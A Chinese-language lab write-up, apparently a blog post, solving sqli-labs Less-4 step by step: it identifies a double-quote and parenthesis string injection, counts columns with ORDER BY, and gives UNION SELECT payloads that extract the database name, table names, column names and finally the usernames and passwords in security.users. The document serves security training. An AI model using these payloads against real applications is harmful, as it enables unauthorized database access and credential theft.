[网络安全]sqli-labs Less-4 解题详析

判断注入类型

GET1" and "1"="1,回显如下:

GET1" and "1"="2
没有回显,说明该漏洞类型为GET型双引号字符型注入

判断注入点个数

GET1" order by 3 --+

复制代码
由上图可知,sql语法中给$id加上了()
猜测后端语句为SELECT * FROM xx where id=("$id")
故构造GET1') order by 3 --+,此时后端语句为SELECT * FROM xx where id=("1") order by 3 --+")
即SELECT * FROM xx where id=("-1") order by 3

GET1") order by 3 --+

GET1") order by 4 --+
故注入点为3个

查库名

GET-1") union select 1,2,database(); --+

回显库名security

查表名

复制代码
-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+

回显四个表名

查users表的列名

复制代码
-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+

查字段

Payload:-1") union select 1,group_concat(username),group_concat(password) from 库名.表名; --+

实例如下:

复制代码
-1") union select 1,group_concat(username),group_concat(password) from security.users; --+
相关推荐
CHEEVEN_QY5 小时前
搅拌摩擦焊FSW工艺参数对焊缝成形影响的实验研究10.1
linux·服务器·数据库
帷幕落秋5 小时前
Redis哨兵模式
运维·数据库
ly76896 小时前
Redis 主从复制全解析:从 PSYNC 协议到复制积压缓冲区的故障切换边界
java·数据库·redis·主从复制·故障切换·psync
夜雪一千6 小时前
MySQL 中什么是条件注释
数据库·mysql
可乐鸡翅yeah_6 小时前
AES‑128 加密 M3U8,IV 初始化向量新手容易踩坑
前端·网络·数据库·ffmpeg·音视频·m3u8在线
花青泽6 小时前
Web安全信息收集--总
安全·web安全
IvorySQL6 小时前
PostgreSQL 日报| relchecks 溢出导致表无法删除(9 月 28 日)
数据库·人工智能·ai·postgresql·区块链
帷幕落秋7 小时前
Redis主从复制
运维·数据库
帷幕落秋7 小时前
Mysql主从复制
运维·数据库
暖核7 小时前
MySQL 高级运维核心:备份恢复、主从复制与 MHA 高可用复习总结
运维·数据库·mysql